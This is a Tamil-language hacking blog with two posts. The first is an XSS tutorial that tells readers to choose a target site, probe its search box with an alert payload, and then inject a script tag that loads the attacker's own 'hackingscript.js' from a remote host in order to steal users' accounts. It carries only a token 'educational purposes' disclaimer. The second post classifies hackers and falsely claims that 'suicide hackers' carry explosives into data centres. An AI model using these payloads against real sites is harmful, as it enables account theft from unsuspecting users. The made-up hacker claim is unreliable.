XSS attack [ எக்ஸ் எஸ் எஸ் தாக்குதல் ]

வணக்கம் நண்பர்களே, இன்று கிட்டத்தட்ட ஒரு வாரத்திற்கு பிறகு பதிவெழுதுவதற்கு கொஞ்சம் நேரம் கிடைத்திருக்கின்றது. இன்று நாங்கள் பார்க்கப்போவது XSS attack பற்றியாகும். இன்று எல்லோருக்கும் இணையத்தளம் ஒன்றினை வடிவமைக்கத்தெரியும். இதில் எத்தனை பேருக்கு தாங்கள் தயாரிக்கும் தளத்தினை எவ்வாறு சிறந்த முறையில் பாதுகாப்பது என்று தெரியும். அது கேள்விக்குறியே. சரி.  நாம் விடையத்திற்கு வருவோம். 

XSS ATTACK என்பது பெரும்பாலும் ஒழுங்காக பாதுகாக்கப்படாத தளங்களில் CLIENT SIDE SCRIPT மூலமாக தாக்குதல் நடத்தும் முறையாகும். இம்முறையானது பொதுவாக ஒரு பாதுகாப்பு குறைபாடு உள்ள தளத்திலே ஒரு சாதாரண பயனாளர் உள்நுழையும் போது அவருடன் இணைந்து தாக்குதல் தாரியும் உள்நுழைந்து இணையத்திலே மாற்றங்களை ஏற்படுத்துவது தான் XSS ATTACK என்று குறிப்பிடப்படுகின்றது. இதனை Cross site scripting என்றும் அழைப்பார்கள்.

பொதுவாக சாதாரண ஒரு HTTP REQUEST மூலமாகவே இத்தாக்குதலினை எளிதாக நடத்தி முடித்துவிடலாம். பெரும்பாலும் PHP பயன்படுத்தி இயங்குகின்ற தளங்களில் தான் இந்த மாதிரியான தாக்குதல்கள் அதிகம் இடம்பெறுகின்றன. உதாரணமாக சொல்லப்போனால் நீங்கள் சாதாரணமாக ஒரு கலந்துரையாடல் தளத்திலே இருக்கின்றீர்கள். அங்கு நல்ல கவர்சிகரமான ஒரு பதிவு இடப்பட்டு இருக்கின்றது. நீங்கள் அங்கு சொடுக்கும் பட்சத்தில் நீங்கள் அந்த பதிவினை காண்பீர்கள். ஆனால் அதே சமயத்தில் உங்கள் கணக்கு திருடு போய் இருக்கும். இந்த மாதிரியான திருட்டினைத்தான் நாம் XSS ATTACK என்று கூறிகின்றோம்.சரி மிக இலகுவாக எவ்வாறு ஒரு தாக்குதலினை தொடரலாம் என்பதை இங்கு பார்க்கலாம்.

தளத்தினை பரிசீலித்தல்

நீங்கள் தாக்கவிருக்கும் தளத்திளை தெரிவு செய்த பின்னர் அத்தளத்திலே தேடுவதற்கு Search box இருக்குமாயின் அப்பெட்டியினுள் கீழ் வரும் கோடிங்கை இட்டு தேடிப்பாருங்கள். அப்பொழுது உங்களுக்கு தெரியும் இத்தளம் தாக்குதலுக்கு இலகுவானதா இல்லையா என்று. 

<IMG SRC=JaVaScRiPt:alert('Site is vulnerable')>

இது போன்று நீங்கள் தேடும் பொழுது அடைப்புக்குறிக்குள் இருக்கும் தகவல் ஒரு POP UP window வில் தோன்றுமாயில் அத்தளம் தாக்குதலுக்கு இலகுவானது என்ற முடிவுக்கு வரலாம்.  அடுத்து நீங்கள் அத்தளத்தினிலே உங்கள் தளத்திலே நிறுவியிருக்கும் ஜாவா நிரலிக்கான தொடுப்பினை கீழ்க்கண்டவாறு கொடுத்து விட்டால் சரி. 

<SCRIPT SRC=http://yourwebsite.com/hackingscript.js></SCRIPT>

இவ்வாறு நீங்கள் ஏற்கனவே பதிவேற்றி வைத்திருக்கும் உங்கள் தளத்தின் ஜாவா நிரலியின் தொடுப்பினை கொடுத்து விட்டால் சரி. இதிலே சொடுக்கும் ஒவ்வொரு சந்தர்ப்பங்களிலும் உங்கள் ஜாவா நிரலி செயற்படும். சரி. இது தான் சாதாரண ஒரு செயன்முறை.

எவ்வாறு அத்தளத்திலே இருக்கும் உறுப்பினர்களை உங்கள் வலையில் சிக்கவைப்பது அதற்கு எவ்வாறு SOCIAL ENGINEERING செய்வது போன்ற விடையங்கள் எல்லாம் நான் சொல்லுவேன் என்று எதிர்பார்த்தால் நீங்கள் ஒரு கொந்தாரக ஆகவே முடியாது. { Don't learn to hack. hack to learn }. இது யார் சொன்னது என்ற ஆராய்ச்சி எல்லாம் நமக்கு தேவையில்லாத ஒன்று.

குறிப்பு: நண்பர்களே, நான் இங்கு வழங்கும் விடையங்கள்  மற்றும் நிரலிகள் அனைத்தும் கல்வி நோக்கத்திற்காகவே. தகவல் திருட்டு ஒரு பாரிய குற்றம். சிந்தித்து செயற்படுங்கள். 

Read More

HACKERS [கொந்தர்கள்]

இன்று முதல் பதிவே கொந்தர்கள் பற்றியது. சரி. நீங்கள் சிந்திப்பது எனக்கு விளங்குகின்றது. அது என்ன ‘கொந்தர்‘ என்று தானே ஜோசிக்கின்றீர்கள்? கொந்தர் என்பது ஆங்கில வார்த்தையான HACKER என்பதன் தமிழ் வடிவம். ஆம்! இன்று நாங்கள் அவர்களை பற்றி தான் பார்க்கப்போகின்றோம்.

தற்காலத்திலே கொந்தர்கள் பல வகையினர் இருந்தாலும் குறிப்பாக இனங்கண்டு வகைப்படுத்தப்பட்டிருப்பவர்கள் மூன்று பிரிவினரே. அவர்களில் WHITE HAT HACKER, GREY HAT HACKER, BLACK HAT HACKER. என மூன்று பிரிவுகளாக பிரிவுபடுத்திப்பார்க்கின்றது இந்த தொழிநுட்ப சமூகம். சரி. இந்த மூன்று குழுவினரையும் பற்றி சற்று விரிவாக பார்த்து விடலாம். 

WHITE HAT HACKERS

இந்த வகையினில் அடங்குபவர்கள் தான் தற்போது வெளியே வந்த மற்றும் வரவிருக்கின்ற கணனி வைரஸகள்  போன்ற வற்றோடு  போராடிக்கொண்டிருக்கின்றார்கள். ஆம். இவர்கள் சட்டரீதியாக கொந்தர் என ஏற்றுக்கொள்ளப்பட்டவர்கள். இவர்கள் பொதுவாக பெரிய பெரிய Antivirus software கம்பனிகளிலே வேலை பார்ப்பவர்கள். இவர்களில் அனேகர் தங்கள் அறிவை நல்ல விதத்தில் பயன்படுத்துபவர்கள். ஒ்வொரு சந்தேகத்திற்கிடமான கோப்புக்களையும் பரிசீலித்து அவற்றுள் புதைந்து கிடக்கும் வைரஸ்களை கண்டு பிடித்து அவற்றை எதிர்ப்பதற்கான Antivirus Database ல் தரவுகளை ஏற்றி எங்களின் பாவனைக்கு தருபவர்கள். நீங்களும் கணனியில் Hacking, Sniffing ல் ஆர்வம் உடையவர் என்றால் அதற்கான பாடநெறிகள் இருக்கின்றன. அவற்றினை கற்பதன் மூலம் நீங்களும் ஓர் கணனி பாதுகாப்பு வல்லுனர் ஆகலாம். மேலதிக தகவல்களுக்கு இந்த தளத்திற்கு செல்லுங்கள்.

GREY HAT HACKERS

இந்த Grey Hat Hackers பாதி நல்லவர்கள். பாதி கெட்டவர்கள். ஆம். உதாரணமாக சொல்லபோனால், காலையில் நல்ல பிள்ளை போன்று அலுவலகம் சென்று வந்து விட்டு பின்னர் இரவு நேரங்களில் அல்லது நேரம் கிடைக்கும் பொழுது வைரஸ்கள் உருவாக்குதல், தகவல் திருட்டு, REVERSE ENGINEERING, CRACKING, DECODING, போன்ற வேலைகளில் ஈடுபடுவார்கள். அத்துடன் இவர்கள் தாங்கள் வேலை பார்க்கும் இடத்தில் மிகவும் உண்மையாக உழைப்பவர்களாக இருப்பார்கள். இந்த வகையினில் சொல்லுமளவுக்கு அதிகமான கொந்தர்கள் இல்லை. 

BLACK HAT HACKERS  

இணையத்திலே ஏற்படுகின்ற பாதி பிரச்சனைகளுக்கு சூத்திரதாரிகள் இவர்கள் தான். சாதாரண மின்னஞ்சல் கடவுச்சொல் திருட்டு தொடக்கம் பெரிய பெரிய இணையத்தளங்களின் முறிவுக்கு காரணமாக இருப்பவர்கள் இவர்கள் தான். இவர்களால் தான் WHITE HAT HACKERS எந்த நாளும் வேலையாக இருக்கிறார்கள். அந்தளவுக்கு கெட்டிக்காரர்கள். இவர்கள் அனேகமாக WEB SITE HACKING & UPLOADING SHELLS, BACK DOORING SITES, BACK DOORING COMPUTERS, CRACKING SOFTWARES, CREATING SPYWARES, CREATING VIRUS'S, SPREADING VIRUS FILES, GAINING UNAUTHORIZED ACCESS TO THE SERVERS. இப்படியான வேலைகளில் ஈடுபடுபவர்கள். இவர்கள் அதி புத்திசாலிகள். ஆனால் அவற்றை நல்ல முறையில் பயன்படுத்தாமல் தீய வழிகளிலே பயன்படுத்தி பணம் பார்ப்பவர்கள். சிலர் இதனை ஒரு பொழுதுபோக்காகவும் செய்து வருகின்றார்கள். 

சரி. இவ்வாறு எவ்வளவு சுருக்கமாக கூறமுடியுமோ அவ்வளவு சுருக்கமாக நான் இந்த கொந்தர்கள் பற்றி கூறியிருந்தேன். ஆனால் இவர்கள் அனைவருக்கும் மேலாக இன்னும் ஒரு பிரிவினர் இருக்கின்றார்கள். அவர்களை SUICIDE HACKERS என்று அழைக்கின்றார்கள். ஏன் என்றால் இவர்கள் தங்கள் உடலில் வெடிபொருட்களை நிறைத்துக்கொண்டு தகவல் மையங்கள் மீது பாய்ந்து தற்கொலை தாக்குதல் நடத்துபவர்கள். இது என்னோ சினிமா பார்த்த மாதிரியே இருக்கு. என்ன அப்படித்தானே? இந்த கணனி பாதுகாப்பு சம்பந்தமான உலகம் சற்று பெரியது தான். வருகின்ற வாரம் ஒரு வித்தியாசமான வீடியோ பதிவுடன் உங்களை சந்திக்கின்றேன்.

அது சரி. எல்லாம் இருக்கட்டும் நான் வந்து எந்த வகை கொந்தர்? நீங்கள் சிந்திப்பது எனக்கு புரிகின்றது. நான் வந்து ஒரு Black hat கொந்தராக இருந்து White hat கொந்தராக மாறியிருக்கின்றேன். ஏன் எதுக்கு என்ற பதிலுடன் அடுத்த பதிவில் சந்திக்கின்றேன்.

நன்றி [Spiderboil66]

  

Read More